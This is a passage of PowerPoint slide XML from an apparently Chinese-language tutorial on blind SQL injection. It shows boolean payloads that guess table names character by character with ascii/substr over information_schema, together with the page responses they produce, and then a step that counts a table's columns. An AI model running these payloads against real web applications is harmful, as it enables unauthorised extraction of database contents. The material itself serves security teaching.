                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&gt;97 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;122 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;109 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;103 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示不存在</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&gt;103 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示不存在</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="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90615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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="952029"/>
            <a:ext cx="11161240" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第四步：猜解表中的字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>首先猜解表中字段的数量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and (select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
